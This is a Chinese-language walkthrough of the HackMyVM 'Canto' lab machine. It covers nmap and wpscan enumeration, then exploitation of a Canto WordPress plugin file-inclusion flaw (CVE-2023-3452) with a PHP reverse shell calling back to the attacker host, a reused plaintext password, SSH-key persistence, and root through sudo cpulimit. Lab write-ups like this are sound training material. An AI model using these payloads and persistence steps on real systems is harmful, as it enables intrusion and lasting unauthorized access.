简介
靶机名称:Canto
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Canto
本地环境
虚拟机:vitual box
靶场IP(Canto):192.168.130.53
windows_IP:192.168.130.158
kali_IP:192.168.130.166
扫描
nmap起手
nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_ 256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds
HTTP
框架是wordpress,直接wpscan先试试
wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug 1 09:23:25 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.130.53/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.
[+] WordPress theme in use: twentytwentyfour
| Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.2
| [!] Directory listing is enabled
| Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.130.53/wp-content/plugins/akismet/
| Last Updated: 2024-07-10T22:16:00.000Z
| Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.3
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/akismet/readme.txt
[+] canto
| Location: http://192.168.130.53/wp-content/plugins/canto/
| Last Updated: 2024-07-17T04:18:00.000Z
| Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt
| [!] The version is out of date, the latest version is 3.0.9
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/canto/, status: 200
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
| References:
| - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
| - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
|
| [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.5
| References:
| - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
|
| [!] Title: Canto < 3.0.7 - Unauthenticated RCE
| Fixed in: 3.0.7
| References:
| - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
| - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
|
| [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.9
| References:
| - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
|
| Version: 3.0.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/canto/readme.txt
| Confirmed By: Composer File (Aggressive Detection)
| - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] erik
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 21
可以看到canto插件有漏洞,searchsplolit找一下
那就没什么好说的了,直接打poc
CVE-2023-3452
https://github.com/leoanggal1/CVE-2023-3452-PoC
先准备一个反弹shell的php文件
<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?>
然后起个监听
rlwrap -cAr nc -lvvp 40000
最后poc打过去就好了
python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166 -s ./shell.php
提权
备份
在/var/wordpress/backups路径下找到账密备份文件
www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!
erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)
提权成功,拿到user.txt
顺手把公钥传上去维权
erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys
sudo提权
sudo -l查看权限
erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimit
GTFOBINS有一键提权方案
erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt snap
结束
